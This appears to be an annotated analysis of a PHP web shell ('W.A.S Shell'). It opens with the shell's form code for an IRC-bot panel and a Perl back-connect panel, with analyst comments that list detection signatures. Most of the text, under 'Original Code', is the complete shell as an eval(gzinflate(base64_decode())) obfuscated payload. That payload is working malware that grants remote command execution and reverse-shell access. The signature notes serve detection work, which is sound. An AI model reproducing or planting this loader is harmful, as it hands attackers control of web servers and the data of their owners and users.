// It is shown whenever $unix is truthy and does not check $safe_mode.
// Column 1 collects ircadmin / ircserver / ircchanal / ircname, by name the settings for an IRC-connected
// component. Column 2 collects ips / ports / use (Perl only) under the same heading key ('_text12') as
// the outbound-connection form in the preceding panel. The handlers are outside this view; confirm there.
// Triage hint: the parameter names ircadmin, ircserver, ircchanal, ircname, ips and ports in request
// bodies are distinctive for this shell family.
if($unix){
echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text214'].$arrow."</b>",in('text','ircadmin',15,'ircadmin'));
echo sr(40,"<b>".$lang[$language.'_text215'].$arrow."</b>",in('text','ircserver',15,'ircserver'));
// The field name is spelled 'ircchanal' and its default 'ircchanl'; signatures must match these
// spellings exactly.
echo sr(40,"<b>".$lang[$language.'_text216'].$arrow."</b>",in('text','ircchanal',15,'ircchanl'));
echo sr(40,"<b>".$lang[$language.'_text217'].$arrow."</b>",in('text','ircname',15,'ircname'));
// This column has no hidden 'dir' or 'cmd' field in the visible lines.
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
// ips is prefilled with the viewer's REMOTE_ADDR (fallback "127.0.0.1"), ports with '80'.
echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ips',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','ports',15,'80'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
echo $te."</td>".$fe."</tr></div></table>";
}
// Page footer: closes the outer table and prints the banner "o---{ W.A.S Shell }---o".
// The banner is a fixed literal, so it can serve as a content signature for HTTP responses or for
// files on disk once the sample is decoded.
echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---{ W.A.S Shell }---o</b></font></div></td></tr></table>";
?><?
Original Code
<? eval(gzinflate(base64_decode('
7b15Xxs58jj89/D58B6UHnbbnhjjA3PGJGAMMeGK
zZEQ8vW23Y3dwXZ73ebKTN77U1WSutWXwYSZnf09
y0zAlkqlUqlUKpWk0tuNN2+H3eHszFzXMkxWZvqb
V/PzrGraY8tkrQd2nt3MNtj8/MbszJvuuN+jvwCK
fxfc9sgejvHj2B73rA1nfv53UaLRtXo99mN+3nmz
wDMBqm+NDdYdj4fz1r9v7NuyVnEGY2swnj95GFoa
a/NvZW1s3Y8XsLZ11u4aI9cal09PduZXNEACaBon
n/er8LHlmA/s99mZKyg3f2X07d7DGjsxuk7fmJ35
MTszHmHu1lF9u1pfY6bhdqFN+eE9+7VYLK7PzrSd
njNaY7/u7Oys8wLmlAWyY6PVs/JqqRyAb/WM9jVA
bG1WPuzWj04Pt+crR/tHkCtzYjCZYTTr8pssjFRw
QrDFa2x5OGZn1sg0BoaPcndkWQOJczQFzig3sG2T
GZKEa4qG24PhzRhraTkj0xr98ssvakXrMn2eCmLm
r49VwZmzEsecumXyWl2rZ7XHfuPm67Xd9ydrjCOh
JrpOzzb9Np4cHUM2Y79u7+TgJw5kv7qDKCaBbB2d
nBwdrCVXE+TPTzbyptW3x2oPstbNeOwMunan24N/
Y1YACpybMYywibXd2ea4u8aKuX/ECgoMV2NkGYm9
+NQ+27HvLdN9cFnL6ZlKTaurq7ymraPtz1jLL41K
/Wh/f2uzPr+zWakGsTE/8z306j72bICvCkDj/eb2
0XlSbnF7YuHNeh3KJtV9UofWJhXd3qx/iNY9O9M3
Rh17sCZEP9ChLcDfGTk3A1MWkczDod437AFyhiMg
/s8XVpaB9znxb35xVVUA0wxn0iV8kE4iYnZmc61n
D66phwSS8y7MJOvspPrpZH67Wjmqb57Ujg7X2MAZ
WFRoc+3Wdmm2ma5U17m1SL//onBpYgmjPbZvrSmK
vFmQM80bPtOxnjHo3Bgdq3ypfzNuDZ56qQPE1c0A
0DsD1rVNq2natynbTM/OQGWMmU77pg8TW7Zjjas9
Cz9uPdRMhMi644eelTVtd9gzHmD+vdSx+kt9PVCw
7TjXtlW2zdeXejm3Ttk/lErdrnP3U5W2ek77emKt
+WitMDcPOtRYd6zUbF+x1BS1+21OY2kWaAwRZPVc
i2epzF0XfSSMECQOa7ZdUGapueZu9eSL3hvoX9Np
7PK5qyE09MoZWoOUPjRc987Mju/HekYf6Yhq7mqE
+aDFzBTAZq7snuXa360AcBohr9o9x7UQCL8NR1an
2TfG7W7T6PVS+kIq+/pteu1+jf4u6BlAnJmz7oc9
x7SwAOo6qKXdTcnUL/mvzHDZ3I1rjYjWX+B/0IJj
q5/SegM277IFsGmsBYJYGN60ena7iebRAi+kId5f
xBBE48wapbR9p21gL60xLTvXbFTrZ9X6F/34/TF8
3t8BtojpN8yy1uhmbEmuvY0z+xKtuH0xOhRLzhrM
37gaGYuiuGcsLghL8R3bwip3nFEbBvRtPptjC4rN
SNIijL3fhXpEPUZGH2WuDZxR3+iJFOiztTwC8DH+
69XV1bpqIIrpMrM5sqFMRJ/9ChP3OoiU0+u1jBEU
aluehi7m8D8l15tHPZCSif8pIG7XMJ07Lz9fwP+U
/KIZRFA08D8FwBiNlPKrJv6nZI9H0ILk0qYxug6R
IGCk6ZUB3X7dGo37GW4T/e6zZE22WLBmh34mcDPU
A6Cgx3bb6M0b0MbBWt82zR5o9a6FLV7Lr6wzYdv1
rCv4Lo0hj4sye8Th/XzBRZnfcsCo6U8AGDvDGPTA
AW4O/R6d1X5dop915jcJjS1Yj/izNU3pMWsPWS3M
4rJGge0HF+PM2MyMu+z3YOFbYcd5VVBXrwZIyKNd
8IOve1gM1Tn6wXoMb7pD+w5mZYtPbOuMMq9AP7uQ
N993vs8LADGafDBvAcC8FqG9KOwGGlmUpwgM1o5p
kiAJQ2244x0vrTsWaD9okb7dZg1j4LKDhkb5XL8L
BcAY1wVsDIvFsk5rxLbr6jwLVq18ioAfaYUgyLxp
tZ2R0IS8ZUKa2/SDdXjFPEtkypKGtEYmlgNrg4rw
xbTXLrEAn515Zw/sJmpivW/1ndFDs2eD+a5nWD6n
/NBkBfp1AGO1Obb7FvReuQSJ76AoJfByKQ4p1gBl
NtesVz+eVhug4nma/hXzcf5wg9mUxHNx7gtm0mwI
wiAAwO6HGT4IwtN4vjMkSyGQz9NkBR2LcmnuwW+U
jvNSykNeZrqe/l2tTQdzxeh1HXcsbJK3PiPZcGQP
xkx70xpteP/aMBtZ8Pdkc2u/yoj1Zd03d/c3jxvV
NeynnjF0LZ21rV6vMTTa9qBTzgnpr2AvboNCLYvx
TFDHhmkiVInRIqmsL+f+obNWh6DLQoOqGPZxEHgo
eEY5v/FmDOSNTRULtoka4NMPE+/Iuirrb/WN92AS
vFkwNtg885Np9v4n8rHcsh19g222QD7YJLg2ziAA
SbPwREguGBtsF/qAyw1CezxekEQujE38RZ9QhWzQ
aEZLg4kOhx5E8hj2Ku+u2Rm/w/6CTloE9j67j4Ii
BRbgRhN/GP6DnyZTf5osmub/zM5cYrEFAIAPf7A/
EAsHx2/whf9m9B8lU0XwDVgKxf74g6WaaSjXBDgd
sCA8/QeZ/5K/KQfBmU7fZ2ewGODOUt0Ej1jgt1fe
/4/nyP+g3kts7mXzkmG9C380s8pvwuD9FmlM/CON
+WYBWSYk+9fHfwgSpwquR8ugRx8xHhF4I1wMpuxK
JZeDol+4e/Or79/0yiy0qNxTqPLFXX5oJco+rGHu
QSXTcuYHLmdAvSljgQ9BHAzs/5fTwJTKXih49gZW
goxsy7LO+0DnCwxYYfUZLFO6jlnWh1hQahPPMvOt
Qc5P3dNjUP4vUkDPnyVoZtgAe5NYxNaYlF/uTfUt
JJ0NjD5+5p3B0Iws6/klnd0avRsLOkSwOcSfGBt/
PWDEkQ0HTFsYbqhjB74CaTH98tdxtvQ8zuK6lEiE
OTgiU8DsUxgOyEveTN4F/PcwFv5YjBAVfoFqoA+k
G+hzXHHPowprP7esF3KyH/mgREZhciki1wVlDbSN
/61PWCZIe7aSw//0Da4FgDhR+0RKfA3wJ1GTLxSx
Dhju8Bu+zM7k4Pdiacn7sOx/WlE+rqqfc7MzspRX
yC+jFAmUoB9AQz+zMwX6mZ3hDtHZmUX6mZ0p0c/s
DJel2Zll+pmdWaGf2ZlV+onig7qoQVAhUQa1ShqK
hTylL5UAP/yi78vyw4r3adX/mFM+G2bfHhBu+EVf
/DSFCSKHvoiS+FngaLVN64r+wv+zM6/e/Qr/09+5
f/yf/PvP31L849yv714pMiMGOvxmLNHogfFxROrf
Jd3lDo2B1F1cusTkILSU3gYAq+fJV2A1uQyyAzLY
tdrXsHTjqm9kmGT9to+xHFY4AfnVeDgJcxAjAMMc
tcECmlbMpBIhd6GJymSe1I0RA0FNwYlrw9MIMPNZ
V2OdTAhlgeP5X4GWJrU7NYezY4bGb4Zm68ycsAlo
Km13YRpt34x6TbAtuBlC38BUAF6kID/DKqf1/aPj
kyb8yTANUK8tLBBabSJ4vXpyWj88qW8eNnaqdTBS
JkK/Pzk53jw9ec9T8FNza7NRq0wstHNyvF9rnBwd
7n9+DP9po1o/Pt+GBhAv1ogX4QawYJnK0eFhtXJy
UjuoHp2eZJjHuYk0bdb2jw6r9fqRbPOcaYwNyWbr
3mpjgbRwSovU0WjgUDKaOYUVRj5Wz57BGb06Gjkj
GBMVbtlhLyM5JjpxWIb1jWsLnatXtmkN2hYzaHUH
Ymeb5HBgzhUTE/ornHhQctDyXCfXMDc846nJ0VoM
c6nTyQ7z7S7uQievStkTDp/D71QXM//b3NzerpNx
94P8948jwIoC9h2ue0NmP/d3S2sHViNRALJVJcAX
fyFLlcMch39okftVGvva+g9iiPDrY68Ru/x9DtI+
f9ZQQ0+6HGtrhdxK4T8+4P77RhH7qwbRSw0h2elP
GUNZjYtF/FiKx4RVquX+NoMKlnpiu4lPjGn2z3+y
V1Z/OH7wktKkFYmqno2MZGKnjKW0y4EGXSjWq2m5
OE0CI7r5Np1s/Rex5P/6K9scj8EahcUDy2azIQ8A
b4O3WQd96pET2KubaxLzymw8svscKB0o5pGHxaTR
zERZsbDmZWVmWqyI5aKZK0wNuaLM+FxCM7z+DEeV
CXsElE0+FR1XaBrfsA1qt2nQ/ggKFvlzFPbugAak
nYIod4VMek6RH9648p0ifKmDrbbaXYf9F7kHSWEg
zfqb4QZ3RpAtqOFHjRmkksqaJl0UGrootMDinY7A
abKY3bM0vnTXSjlNmJnagjVuL/Dd6VBhPo5k8a4B
qzTk1nevKHpwX2nS4NRp/xsqIQfN8RF6Z/Ar9930
rFurV85xoXyF6aCYQaDdFBG2pqXFvv27/rVpj7xU
9EW1u6EUju31a/Lxz3mUQcXvxOBNaQsajFws4m2X
p+YMIGDOeNOGhSOoDq9cGhJfvybHGcODBympSTyI
L3PG17QEkEBqI8KgzAdVGhWCWveBRBuTAZQm41c+
aO66QEKKZ83Pp5lgVDbLufQMgx1ZTL8WFhZgApD8
e6odwWffkeXe9MZx868YgyF3QDEnV/959Ay84PKf
0SgSqkuSVWY7m/uNKvbR78y0QVZ2DGin+Qq4xvzZ
kfFijx/N4Hj94xlpfpp04vEMYgR9yeIsg7OaVy/P
41jXeUdzPcCUBTJ83jk6PKFRF54ipTbV5eJQX1e1
JEiQogt9L5t0QNO8jUcWysJnx5XGfIFrZjltxx8I
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
3YaR4a0i11ZEJDGMSKx7vJ3zb+jJ1XV4hYl1/ZTz
I+zVi6qg1sa2PbLo1ViuQ7ihnORGeOG68b3qHjvj
Y+Qvr/3AcDFW26TqPf+EF0vsndKZqTR361gP6NiR
akHEFaNoHXEuEx2Nl2I6q0/W/zq5qwDq+S62uEbr
2aAi+8JvlPI0nOr1p/TEC1TLr/I/Xq/vIvIWaHMj
ZdQoQbPZnx338JFY2XLGjZli2sObwKwZ3GdiiSpg
wvDnOy8/uVNxfBppScwyOaqZxIlKaNYV7eKiVabB
N9wOlFMw+sERIBzAYw5D0byTkSsIYl05zeM7Xdth
R2sgytkc1hV4RGBNyxC6iPuSSEHwL3nc9dPSvzPv
qzY/P6+tq47HFxm8/HkPqiTnS/cLjielgvyThk/4
mo8/krzkyF7UBM+vz4kpxxkeE2UTpE4PkhQd5ew/
GhAfz39MsKz7Vv/vONAPqgdH9c8/NdahZcpYh2/h
sY4AsWNdDnUC+JmhHhjpiO1/I/1/I/2vGukUy1hc
pZidWfjtqcfdE4/B/7YwO4NhkZvoSsjrrLyhV/mt
QxNPK/WNgalnFJCCCiIhGN0k585kBbZIsOgEjMO0
SLnnzugaWojmvzN6CACUCOB02JO+PjehniUC5HY8
OYvUzGXK3OzZhmu5gZwVymnwExIGAnjZrZtxkBmB
nIJCWADjKmVs2cAROlczdthCyx4stAy3GwDM53QA
PCZHupqcp2T5VhcoJ2ZQ/NpA9UWvlmDhAhZGD8e8
jKsQyC5idu04mLgYoQNr4F1TicNS0sN9gkF4YAHb
d0AeYjonv4Qlzu1xiAPLmFznxSKdll/Rk3s0v6pT
xwAR9jjYpQXi66kbLFAgtvKd30PrjhylQQBiHXrs
h/YwlFX0KRmG+6uwqDSC4uEEcktKbrTsUphU5HxJ
DpkgLLGDhgpMyX4o8AAMcWWzUqk2Gmy7elirbgcw
80FS6YL+CBYsEs8qxjjIaSzDxw7uhwZLED/JWT1w
oBi+qhQEIH5W8cUC0HWsHaa1SEw9sdwxaz3Q6TE8
LNrEXQ8MTncHwsLap/V971RxcADwgYvFg1gXw1j9
UOqE0h60ezfwRWINli6FS1MZT9CR8+SlZfMU0l95
oSOIh/p1u8Wy4rZSIHOZS1PHDlW+og78YBb1q9y4
DmpQ6rltPMQqd5vYOFAncosrJYQKFqZObBi3Fp3O
x+ZFRtoi70doLR/rwcyiJwWoqJAnQf2ZkxUEiy1y
cRtc6mMqRKhfsaNB7wHDhJtC5b0Klip5lbmAMTST
EMtp2947DBoEWPYAbo2RzXeRSW8BfBbdrgFo6oxt
8k7TsxKhxlPj8gHOBMuvKuXd9sgejnllMdqxREw6
s0ErwaKR0eHWQH7eywdTE2bIGJACZw1MOvg1mMeV
/gBn2GDvlRYDpWT3h1rpoQ6Wpc6gDosUo3zqj0Nn
3MVwfmupYCb1Bb/PtyCYhP26sG2HWEPdENHVJeJu
hOlLxEhTwUENKEYqC5byNVmbXw4NZlP7gbD4XH8A
8K2MUPaiLBybW/IpC2Ys+dITzOCMAyEeLFS6ndEQ
foNuC8IQzyox1tYSsW1ojIx+Pmgf5byMQjADeaM1
KBK4NOBcRoDMdtcw2Nw8jfzK+6PzQ9CKdPbeuaKT
ykCkNcJnRU5r2yrkbv0YIClQv4Afsd0gyMHRNoDk
lpeXM/C7VMpms1qArgJX1PdjKnAVls7loifZKJ1O
zwyNueXFAEBEfJepa35jD84NaxsDjIgFiqkD674g
GNc6ljFqd4NjiN3aRpSuFWI0RhoMJpMIHlrBgbtS
ULV+yG6lBgb21oP51L6EvNIjc6TX0SL2CLWF36eM
UV8rXFjFRRHVIAwB02BcVIGDeJaT8AjD8mo8nI+r
n+R95+RYZK5FzKyVVW+Q8ofrgwY77xMRmZFFjKpV
6pxN6GH71oiYDKvUScg2fMfZSIIqChqDqYuS8tYI
2AyS3A5VXRL24chl+IxvMHNJmUTxveibBDjia5u/
KLbGgnnEO/eGZttw3iofAij6iJqGKvWHcgyCD7/x
EGwksGcYrgOHcRZMPsctAWsgLClYFvndGrtmyOVF
